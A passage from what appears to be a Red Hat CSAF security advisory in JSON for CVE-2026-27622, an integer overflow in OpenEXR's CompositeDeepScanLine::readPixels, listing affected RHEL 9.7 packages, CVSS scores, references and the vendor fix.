"name": "openexr-devel-0:3.1.1-3.el9_7.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.s390x"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_7.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.x86_64"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.aarch64"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.i686"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_7.1.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.ppc64le"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.s390x"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_7.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.x86_64"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.src",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.src",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-20T03:46:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.src",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.src",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8888"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.src",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.src",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.src",
"AppStream-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-debugsource-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-devel-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-libs-0:3.1.1-3.el9_7.1.x86_64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.i686",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.ppc64le",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.s390x",
"AppStream-9.7.0.Z.MAIN:openexr-libs-debuginfo-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.ppc64le",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.s390x",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.src",
"CRB-9.7.0.Z.MAIN:openexr-0:3.1.1-3.el9_7.1.x86_64",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.aarch64",
"CRB-9.7.0.Z.MAIN:openexr-debuginfo-0:3.1.1-3.el9_7.1.i686",
